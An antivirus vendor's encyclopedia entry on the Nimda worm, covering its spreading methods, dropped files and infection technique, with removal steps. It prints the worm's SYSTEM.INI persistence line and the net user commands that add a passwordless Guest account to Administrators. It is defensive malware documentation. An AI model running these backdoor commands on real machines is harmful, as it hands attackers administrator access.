Virus Encyclopedia

This extremely troublesome virus combines range of spreading methods. It sends itself by e-mail, can install itself on an unpatched version of IIS server, can infect neighbor computers and you can get it just by looking at pages on infected servers.

It comes in an e-mail as an attached file README.EXE. If read in the Outlook or Outlook Express clients, the virus can be run just by viewing the e-mail.

A description of this security hole can be found at this URL:
http://www.microsoft.com/technet/security/bulletin/MS01-020.asp

Here is the latest IE problem with a link to the patch:
http://www.microsoft.com/technet/security/bulletin/MS01-027.asp

It scans saved web pages for e-mail addresses to send (as I-Worm/Sircam did). After successfully infected the computer, it runs a thread that generates random internet addresses and tries to connect to them to search for known security holes to use.

A description of particular holes and links to patches to them you can find here:
http://www.microsoft.com/technet/security/topics/Nimda.asp

This virus can also re-use copies of system file CMD.EXE, saved as ROOT.EXE by the virus CodeRed II (aka CodeRed.c).

It subsequently scans a hard disk for files with names containing of the following set:
default, index, main, readme a .htm, .asp, .html
To such a file it inserts a small Javascript code that downloads and runs a file readme.eml. The contents of the file looks like an e-mail that this virus sends out. These files with an extension .eml (and .nws) are strewed in the folders on disks.

It also places its copies on a disk with names MMC.EXE, LOAD.EXE, RICHED20.DLL and ADMIN.DLL. The LOAD.EXE file is scheduled to run on the start of Windows in the SYSTEM.INI file, section [boot], line:
shell=explorer.exe load -dontrunold

I-Worm/Nimda also takes care of the last decrease of security of the infected computer. It adds the Guest account to the Administrators group:
net user guest /add
net user guest /active
net localgroup Guests guest /add
net localgroup Administrators guest /add
net user guest ""

It sets sharing for all available disks and switches off viewing file extensions of known file types in Explorer.
Last but not least, the virus is able to infect .EXE and .DLL files by quite unusual technique: it creates a copy of itself, takes an icon of attacked file and puts the original file to the resource section of its new copy. Then replaces the original file with the new copy.

Removal:
If you have infected computer connected to a LAN, you need it to unplug from the LAN, and re-connect again in the moment when all computers are clean. In any case, check for all available security patches.

1. Download the removal utility rmnimda.exe
2. Run the utility
3. Restart the computer
4. Scan the computer by AVG complete test
5. Delete all infected files
6. Repeat until computer is clean

Remove the sharing of disks and the Guest account from Administrators group.

Homepage | Site Map | Contacts | Privacy Policy | License Agreements | Imprint | RSS
© 2009 AVG Technologies, formerly Grisoft